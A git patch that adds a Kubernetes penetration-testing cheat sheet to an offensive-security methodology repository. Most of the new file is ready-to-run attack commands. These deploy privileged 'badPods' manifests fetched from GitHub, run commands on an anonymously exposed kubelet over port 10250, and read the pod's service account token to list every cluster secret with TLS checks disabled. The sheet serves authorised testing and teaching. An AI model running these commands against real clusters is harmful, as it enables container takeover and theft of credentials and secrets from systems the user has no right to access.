From 2ed3c03e78b776b557bfd49983ae95cd52ef09fb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 18 Nov 2022 13:00:11 +0100 Subject: [PATCH] Kubernetes Pentest --- .../Container - Docker Pentest.md | 2 +- .../Container - Kubernetes Pentest.md | 46 +++++++++++++++++++ 2 files changed, 47 insertions(+), 1 deletion(-) create mode 100644 Methodology and Resources/Container - Kubernetes Pentest.md diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index 595f30f..b836acd 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -1,4 +1,4 @@ -# Docker Pentest +# Container - Docker Pentest > Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. diff --git a/Methodology and Resources/Container - Kubernetes Pentest.md b/Methodology and Resources/Container - Kubernetes Pentest.md new file mode 100644 index 0000000..c59775f --- /dev/null +++ b/Methodology and Resources/Container - Kubernetes Pentest.md @@ -0,0 +1,46 @@ +# Container - Kubernetes Pentest + +> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management. + +## Summary + +- [Tools](#tools) +- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) +- [Obtaining Service Account Token](#obtaining-service-account-token) +- [References](#references) + +## Tools + +* [BishopFox/badpods](https://github.com/BishopFox/badpods) - A collection of manifests that will create pods with elevated privileges. + ```ps1 + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml + ``` +* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) + +## Accessible kubelet on 10250/TCP + +Requirements: +* `--anonymous-auth`: Enables anonymous requests to the Kubelet server + +* Getting pods: `curl -ks https://worker:10250/pods` +* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'` + +## Obtaining Service Account Token + +Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token` + +Use the service account token: +* on kube-apiserver API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` +* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="" get secrets --all-namespaces -o json` + + +## References + +* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) \ No newline at end of file